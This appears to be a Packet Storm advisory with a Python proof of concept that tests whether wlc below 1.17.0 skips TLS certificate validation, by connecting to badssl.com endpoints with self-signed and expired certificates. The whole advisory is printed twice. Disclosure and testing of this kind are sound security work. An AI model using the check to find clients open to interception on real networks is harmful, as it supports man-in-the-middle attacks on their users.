Description
This proof of concept demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed. By attempting connections to endpoints with invalid certificates such as selfβsigned or expired certificates,...
Basic Information
ID
PACKETSTORM:215967
Published
Feb 20, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : SSL Certificate Validation Bypass in wlc Versions Below 1.17.0 |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://ubuntu.com/security/notices/USN-7981-1 |
=============================================================================================================================================
[+] Summary : This Proof of Concept (PoC) demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed.
By attempting connections to endpoints with invalid certificates (such as selfβsigned or expired certificates), the PoC verifies whether wlc accepts the connection without proper SSL verification.
Successful execution indicates that a ManβinβtheβMiddle (MITM) attacker could intercept or manipulate communications. The PoC is intended strictly for educational and controlled testing environments.
[+] POC : python poc.py
#!/usr/bin/env python3
import subprocess
import sys
import shutil
def test_ssl_bypass(url):
print(f"[*] Testing URL: {url}")
if not shutil.which("wlc"):
print("[!] The 'wlc' tool was not found in the system path.")
return False
try:
cmd = ["wlc", "--weblate-url", url, "list-projects"]
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=10
)
print(f"[*] Standard Output (STDOUT): {result.stdout[:100]}...")
print(f"[*] Standard Error (STDERR): {result.stderr[:100]}...")
print(f"[*] Exit Code: {result.returncode}")
return result.returncode == 0
except subprocess.TimeoutExpired:
print("[!] Connection timed out.")
return False
except FileNotFoundError:
print("[!] Failed to execute 'wlc' (not found or not executable).")
return False
except Exception as e:
print(f"[!] Error: {e}")
return False
if __name__ == "__main__":
test_urls = [
"https://self-signed.badssl.com/",
"https://expired.badssl.com/",
]
print("[*] Testing for SSL Bypass vulnerability in wlc")
print("[*] Target version: < 1.17.0")
for url in test_urls:
if test_ssl_bypass(url):
print(f"[OK] SSL verification bypassed for: {url}")
print("[!] Vulnerability confirmed: An MITM attacker could intercept the connection.")
break
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
| # Title : SSL Certificate Validation Bypass in wlc Versions Below 1.17.0 |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://ubuntu.com/security/notices/USN-7981-1 |
=============================================================================================================================================
[+] Summary : This Proof of Concept (PoC) demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed.
By attempting connections to endpoints with invalid certificates (such as selfβsigned or expired certificates), the PoC verifies whether wlc accepts the connection without proper SSL verification.
Successful execution indicates that a ManβinβtheβMiddle (MITM) attacker could intercept or manipulate communications. The PoC is intended strictly for educational and controlled testing environments.
[+] POC : python poc.py
#!/usr/bin/env python3
import subprocess
import sys
import shutil
def test_ssl_bypass(url):
print(f"[*] Testing URL: {url}")
if not shutil.which("wlc"):
print("[!] The 'wlc' tool was not found in the system path.")
return False
try:
cmd = ["wlc", "--weblate-url", url, "list-projects"]
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=10
)
print(f"[*] Standard Output (STDOUT): {result.stdout[:100]}...")
print(f"[*] Standard Error (STDERR): {result.stderr[:100]}...")
print(f"[*] Exit Code: {result.returncode}")
return result.returncode == 0
except subprocess.TimeoutExpired:
print("[!] Connection timed out.")
return False
except FileNotFoundError:
print("[!] Failed to execute 'wlc' (not found or not executable).")
return False
except Exception as e:
print(f"[!] Error: {e}")
return False
if __name__ == "__main__":
test_urls = [
"https://self-signed.badssl.com/",
"https://expired.badssl.com/",
]
print("[*] Testing for SSL Bypass vulnerability in wlc")
print("[*] Target version: < 1.17.0")
for url in test_urls:
if test_ssl_bypass(url):
print(f"[OK] SSL verification bypassed for: {url}")
print("[!] Vulnerability confirmed: An MITM attacker could intercept the connection.")
break
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================